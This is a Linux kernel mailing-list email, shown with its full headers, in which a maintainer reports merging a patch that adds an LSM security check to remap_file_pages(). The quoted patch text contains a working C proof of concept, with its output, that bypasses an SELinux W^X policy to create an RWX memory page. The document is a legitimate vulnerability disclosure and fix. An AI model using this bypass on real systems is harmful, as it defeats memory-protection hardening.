From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on aws-us-west-2-korg-lkml-1.web.codeaurora.org Received: from kanga.kvack.org (kanga.kvack.org [205.233.56.17]) by smtp.lore.kernel.org (Postfix) with ESMTP id 729FECE8D5D for ; Thu, 19 Sep 2024 08:14:09 +0000 (UTC) Received: by kanga.kvack.org (Postfix) id F3B126B0089; Thu, 19 Sep 2024 04:14:08 -0400 (EDT) Received: by kanga.kvack.org (Postfix, from userid 40) id EEB006B008A; Thu, 19 Sep 2024 04:14:08 -0400 (EDT) X-Delivered-To: int-list-linux-mm@kvack.org Received: by kanga.kvack.org (Postfix, from userid 63042) id DB30D6B008C; Thu, 19 Sep 2024 04:14:08 -0400 (EDT) X-Delivered-To: linux-mm@kvack.org Received: from relay.hostedemail.com (smtprelay0013.hostedemail.com [216.40.44.13]) by kanga.kvack.org (Postfix) with ESMTP id B9DEB6B0089 for ; Thu, 19 Sep 2024 04:14:08 -0400 (EDT) Received: from smtpin03.hostedemail.com (a10.router.float.18 [10.200.18.1]) by unirelay06.hostedemail.com (Postfix) with ESMTP id 774FAA991D for ; Thu, 19 Sep 2024 08:14:08 +0000 (UTC) X-FDA: 82580774976.03.BC12B14 Received: from mail-yw1-f179.google.com (mail-yw1-f179.google.com [209.85.128.179]) by imf19.hostedemail.com (Postfix) with ESMTP id AADB91A000D for ; Thu, 19 Sep 2024 08:14:06 +0000 (UTC) Authentication-Results: imf19.hostedemail.com; dkim=pass header.d=paul-moore.com header.s=google header.b="P2zAj/jI"; spf=pass (imf19.hostedemail.com: domain of paul@paul-moore.com designates 209.85.128.179 as permitted sender) smtp.mailfrom=paul@paul-moore.com; dmarc=pass (policy=none) header.from=paul-moore.com ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=hostedemail.com; s=arc-20220608; t=1726733533; h=from:from:sender:reply-to:subject:subject:date:date: message-id:message-id:to:to:cc:cc:mime-version:mime-version: content-type:content-type: content-transfer-encoding:content-transfer-encoding: in-reply-to:in-reply-to:references:references:dkim-signature; bh=QvabaifNj3In5vF9Dr1bxXne5NhXbr/0+/BClonZfwY=; b=H4iwZGAk9MyOyNKgdfSOXvlFNWehNK2WvpV0GznfBlEiS5HfsWfIF/62rdw19OfRWkQ7Dr Xx9qQkk9Xfi/R/CY9eC9EALZKvYuFaqM86i4GmkZH9JQ8YbpJOQI551fUMGTx7uyJkNqt9 SrP5BJQEBKSC9Z/mBkR5+rVanTVla4c= ARC-Seal: i=1; s=arc-20220608; d=hostedemail.com; t=1726733533; a=rsa-sha256; cv=none; b=2IFM8p+BT+xRrgfBzw4rsfWZlWouXCciTV0Bid8ZSLIG0kEmJlKwwFW0wdp06Y4Fi/F6kp o/lVvEGzp2KqtTJdxYJ8Q4MgCr5cL3HsG4z69Ykug4iQgICWk9Q6kUKX70X1FAwQC0HjEC 8PZA4IhBGPsReoNRixUqXN41QENtrUg= ARC-Authentication-Results: i=1; imf19.hostedemail.com; dkim=pass header.d=paul-moore.com header.s=google header.b="P2zAj/jI"; spf=pass (imf19.hostedemail.com: domain of paul@paul-moore.com designates 209.85.128.179 as permitted sender) smtp.mailfrom=paul@paul-moore.com; dmarc=pass (policy=none) header.from=paul-moore.com Received: by mail-yw1-f179.google.com with SMTP id 00721157ae682-6d6891012d5so4799517b3.2 for ; Thu, 19 Sep 2024 01:14:06 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=paul-moore.com; s=google; t=1726733646; x=1727338446; darn=kvack.org; h=content-transfer-encoding:cc:to:subject:message-id:date:from :in-reply-to:references:mime-version:from:to:cc:subject:date :message-id:reply-to; bh=QvabaifNj3In5vF9Dr1bxXne5NhXbr/0+/BClonZfwY=; b=P2zAj/jIs9Bb3UiHm8c3vva2O6xLyFYGgUWhizQ+80RUUHWX3gcCx8ePob9Lqf27Xa 7eEX+Mu4TOtDlonNCplwiywo3bkV4bpT3cgXPG0ywAnW1mhvqh7+KkNe5ioeuO42OxN9 fr4nLitCnEQ1nuwP6JCMDQCkg5nPTgziDCg/dYk/1v5L8ePrvmJUktlgt2R2zwBDSqf7 /8QPaZ94UG7XtVm65q20aXDNr3UJDfqDBJ3qhYdMrIUPBCCYlSJifSIAksW3Zsx6uMT+ FJ/JoY0DN3JXOPaNVaz8uzuKxoW3kYSrKbL7Qunf7WC2n54EWXArFKjJ4t4gchwP5QLD Gcww== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20230601; t=1726733646; x=1727338446; h=content-transfer-encoding:cc:to:subject:message-id:date:from :in-reply-to:references:mime-version:x-gm-message-state:from:to:cc :subject:date:message-id:reply-to; bh=QvabaifNj3In5vF9Dr1bxXne5NhXbr/0+/BClonZfwY=; b=mRoAEIu47WraGrrYivAQB7u3EtbOMJipzFkFS0C+UfwsA2KXHKjlt7x27IiRdqWYdH 5ypeOf/aq9YOEJAZhYslCmBtg9M3XZ4FETYWwiZFLuIlEEva/hpSiitayIDDK7EauThn FAOSrQnG4L8XdRtp82oVQ1TpNmjkBE6wcZ4XJHrcklW+GLivog5a3FJaP7Q7Qrs0KMB/ h4XiQRnNexQpjSM9H/290ESEsr0EexcdTnPJeJYjFzZwZSQxMxFGiNw1rFgzZiQSsQnY ih1G12OnoSsQyx+hC79qinh+8DxxjJa62Nl2WFcLaJ0bVd+4gPnnwnKVJKeLzNub6gt1 dF4w== X-Forwarded-Encrypted: i=1; AJvYcCXMgUbrAUxxGc7+Uej2v68dw9SCj195ktz5mF6STZOSHehTlGQIq1NaBJJmyo3rfxEq+Hf5FXp8pg==@kvack.org X-Gm-Message-State: AOJu0Ywm6EEAjD271BNIqziqRWucp9Tff/ER5ze6m+YUxanTivoW/gpi oglUrII7RQxO8x424hFXaqskanjgJvTvh0p7LBEXNXJ23BYT9M/bkjGKq8rQQoRwcttNlfpHGhn 9O0GTdOYvmbeXUKX1Jj6HDbmhjRUApTvZea3d X-Google-Smtp-Source: AGHT+IEpgaVMJ2zXX7Bxf0S7zhjSoCtdZL3ewODqwocfT6IJDtlugmG7DbcNQpbt4d4FVnJMr0I/+wGdR0KtiRdLxpQ= X-Received: by 2002:a05:690c:385:b0:6b0:d9bc:5a29 with SMTP id 00721157ae682-6dbb6b95936mr226254977b3.32.1726733645745; Thu, 19 Sep 2024 01:14:05 -0700 (PDT) MIME-Version: 1.0 References: <20240919080905.4506-2-paul@paul-moore.com> In-Reply-To: <20240919080905.4506-2-paul@paul-moore.com> From: Paul Moore Date: Thu, 19 Sep 2024 04:13:54 -0400 Message-ID: Subject: Re: [PATCH] mm: call the security_mmap_file() LSM hook in remap_file_pages() To: linux-security-module@vger.kernel.org, linux-mm@kvack.org, selinux@vger.kernel.org Cc: ebpqwerty472123@gmail.com Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: quoted-printable X-Rspam-User: X-Rspamd-Server: rspam04 X-Rspamd-Queue-Id: AADB91A000D X-Stat-Signature: twgee6uyn3rx8izjo1gn44tmq3k5rd1k X-HE-Tag: 1726733646-920545 X-HE-Meta: U2FsdGVkX1+P4o5FapDC3bqionQUojwhl7v3MDjqvrvdB7dSCndPjwlnd7Nlx1U0AJLBPLBqqGeIO1nl+wo6ewK6yapzXEV4xM5nQHz2cR+oYuTvtAlGIWtA7HQimrIXQuXTba0g5sBUHT9eyPvneefCkROz5R/JxhkDGRbORwtOvGqyb8dJPKI1hSzQjqQG9kjIWnG5SoH1oW0S5ITTymsEtRs/aThDqHWa/SbeCTFZ7WU2wQa6w7vlke2jilCkJT4KEx71mnecCaDBI1IfUfJ8zhjf3K4Nz27hDToe17etl2o8/q1CrweWYUuyBpoEI0P4cg0JkCE957VCVKpIrhqAeMbaoX3cTo2a3QmWRWmcjKBXdcYSN1e7DZb1FoRI5zuT7fABD/uKc4WnVT6ufdlJLqWTOx+NtWM3mQjz7ezink7GAdJNBUeSKm/zkMg/JnObB3IPI6ZKMrfpFVdPjpLdjz+aR/RX6mSmpVSEWcK/jZzDCqbszrqSA5LGfHhMy3WmOzc0aU9Hprenb3W/YkbeVJWsrxDxkMnoWqHeRs1VgKwD7OAfBpOLUnz0G76w2Arn/2jMA/K+11rRKO8/8AJIkt73+onOdxwgV1d+qSIy1p8dMmhcJWBypX5DumSsGd46wgQXajYgLhHY2lbAtCeKoWQMoh8Sr2noPAiSSm2U0+j8UipFQVEuo6m5knWOV5FO6mos/S/yp0xf7lhdEUeV6360o9mTUc04b2nu3fSsksN6Pv4NLp40adVskNekAhwnUV0LXNHos83XzGaSZSsW/PgKspzrRzkgmAA3ZJe53tfN4FsM2kle813uNwI586MqDeAkK+WmlXvHIF+BmvkYKB6iORCsvXXL/gGSxX2mGh/78pqoewKLIzEuw/Re2O7qiGSe7FC+oGQRZ5xPEl6Mg7zlTOeOqjEH34lokYSnb5Qd4Z/6ZuI0MPCxUDaw5zBRePQMC7fvatsKMEs 07kD6f+z XzpwWfK8ExW+Qu9reuv2KZADmLriCyn536kDnWSwH87I3nPXpDR9ZFgflHqJOELjaQvLyMVgTVqtY3fCa1LzdsIHysmJyxVVZ0RCM/81JcqbzNU6qwY5pIozsMG4zt/2NSS0uFSAO85YNdXnOr7ZKFhg3HM3F77MztcXXYr5BmZIK6cCOmXbGQqKAJOlNPL4QAk5+lHRZwYlroMfmG3FFpC56ZodXx9wm7ODlEPeYYC8Cti5MVovDMnoQhmKHvJ4/ob34tjxiVqKmfh2KlTLLY5oBrdXfdlFlYlB5c2jeI7LipeYFJCetet2lhwn28CkWWVVWg3CAU+vACQRSeIGcKJZn9L7hIjfiLzI7XqxHcWq9WRfedO3WPj8P3nccC57ZOgaA X-Bogosity: Ham, tests=bogofilter, spamicity=0.000003, version=1.2.4 Sender: owner-linux-mm@kvack.org Precedence: bulk X-Loop: owner-majordomo@kvack.org List-ID: List-Subscribe: List-Unsubscribe: On Thu, Sep 19, 2024 at 4:09=E2=80=AFAM Paul Moore wr= ote: > > From: Shu Han > > The remap_file_pages syscall handler calls do_mmap() directly, which > doesn't contain the LSM security check. And if the process has called > personality(READ_IMPLIES_EXEC) before and remap_file_pages() is called fo= r > RW pages, this will actually result in remapping the pages to RWX, > bypassing a W^X policy enforced by SELinux. > > So we should check prot by security_mmap_file LSM hook in the > remap_file_pages syscall handler before do_mmap() is called. Otherwise, i= t > potentially permits an attacker to bypass a W^X policy enforced by > SELinux. > > The bypass is similar to CVE-2016-10044, which bypass the same thing via > AIO and can be found in [1]. > > The PoC: > > $ cat > test.c > > int main(void) { > size_t pagesz =3D sysconf(_SC_PAGE_SIZE); > int mfd =3D syscall(SYS_memfd_create, "test", 0); > const char *buf =3D mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE= , > MAP_SHARED, mfd, 0); > unsigned int old =3D syscall(SYS_personality, 0xffffffff); > syscall(SYS_personality, READ_IMPLIES_EXEC | old); > syscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0); > syscall(SYS_personality, old); > // show the RWX page exists even if W^X policy is enforced > int fd =3D open("/proc/self/maps", O_RDONLY); > unsigned char buf2[1024]; > while (1) { > int ret =3D read(fd, buf2, 1024); > if (ret <=3D 0) break; > write(1, buf2, ret); > } > close(fd); > } > > $ gcc test.c -o test > $ ./test | grep rwx > 7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted) > > Link: https://project-zero.issues.chromium.org/issues/42452389 [1] > Cc: stable@vger.kernel.org > Signed-off-by: Shu Han > Acked-by: Stephen Smalley > [PM: subject line tweaks] > Signed-off-by: Paul Moore > --- > mm/mmap.c | 4 ++++ > 1 file changed, 4 insertions(+) I've just merged this into the lsm/stable-6.12 branch and plan to send this to Linus shortly. --=20 paul-moore.com